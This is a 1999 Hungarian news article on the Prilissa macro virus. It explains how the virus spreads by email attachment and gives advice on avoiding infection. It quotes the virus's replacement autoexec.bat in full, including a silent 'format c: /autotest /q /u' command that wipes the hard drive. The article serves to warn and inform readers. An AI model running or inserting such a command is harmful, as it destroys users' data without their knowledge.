Karácsonyi ajándék Prilissától

1999. november 22. 14:34
Két korábbi vírus, a PRI és a Melissa kereszteződéséből született a legújabb veszélyforrás, a Prilissa, amely amellett, hogy megtartja elődjeinek minden "jó tulajdonságát", ráadásként karácsonykor még meg is formázza a megfertőzött gép merevlemezét.
A Melissától örökölte a most terjedő vírus azt a tulajdonságát, hogy "egy nagyon fontos dokumentum" formájában attachmentként terjed, s ha véletlenül kinyitják, akkor 50 helyre automatikusan továbbítja magát. A PRI ehhez színes foltokat helyez el a felhasználó dokumentumaiban, s ehhez jön karácsony reggelén a meglepetés: minden eltűnik a merevlemezről. Az eltüntetést tulajdonképpen mi okozzuk a gép bekapcsolásával. A Prilissa csak az autoexec.bat rutint cseréli ki december 25. reggelén a következőre:

"@echo off"

"@echo Vine...Vide...Vice...Moslem Power Never End..."

"@echo Your Computer Have Just Been Terminated By = CyberNET = Virus !!!"

"ctty nul"

"format c: /autotest /q /u"

Mivel a Windows NT nem használja az AUTOEXEC.BAT-ot, ezért a Windows NT felhasználói ettől a hatástól védve maradnak. Viszont a Windows 95/98 felhasználóinál a következő bekapcsoláskor automatikusan megtörténik a formázás, és utána megjelenik a "jöttem-láttam-győztem" felirat, s a muszlim hatalom örökkévalóságába, az emberi éra végességébe vetett hit hangoztatása.

A legjobb védekezés továbbra is az, hogy még az ismerősöktől kapott levelek esetében sem nyitjuk ki automatikusan a mellékleteket, s ha várunk is valakitől ilyet, amikor megkapjuk, tisztázzuk telefonon, hogy ő volt-e a feladó, valóban tudatosan küldte, s bizonyos a dolog tisztaságában. Ezután se automatikusan nyissuk meg a mellékleteket, hanem a lemezről, mégpedig megnyitás előtt nézzük meg, hogy be van-e állítva a Wordben a makróvédelem, mert ez esetben a makróval ellátott fájlokra külön is figyelmeztet a szoftver. Ha olyan jelzést kapunk, hogy a fájlban makró van, bár az lehet ártatlan is, mindenképpen makró nélkül nyissuk meg a fájlt, így tartalmát ugyanúgy el tudjuk olvasni, s nem vagyunk akkora veszélynek kitéve...

Ha már megtörtént a baj, akkor természetesen a nagyobb vírusirtó szoftverházak termékeihez kell fordulnunk, amelyek természetesen gyorsan felkészülnek minden új jövevényre, csak hát mindezt kizárólag utólag tudják megtenni.

Kövess minket a Facebookon!

Cikkgyűjtő

További fontos híreink

Idén is keresi a digitális szakma női példaképeit az IVSZ és a WiTH

2024. november 22. 16:40

Huszadik alkalommal adták át a Hégető Honorka-díjakat

2024. november 21. 16:58

Hosszabbít ’Az Év Honlapja’ pályázat!

2024. november 19. 09:54

Törj be a digitális élvonalba: Nevezz ’Az Év Honlapja’ pályázatra!

2024. november 14. 16:36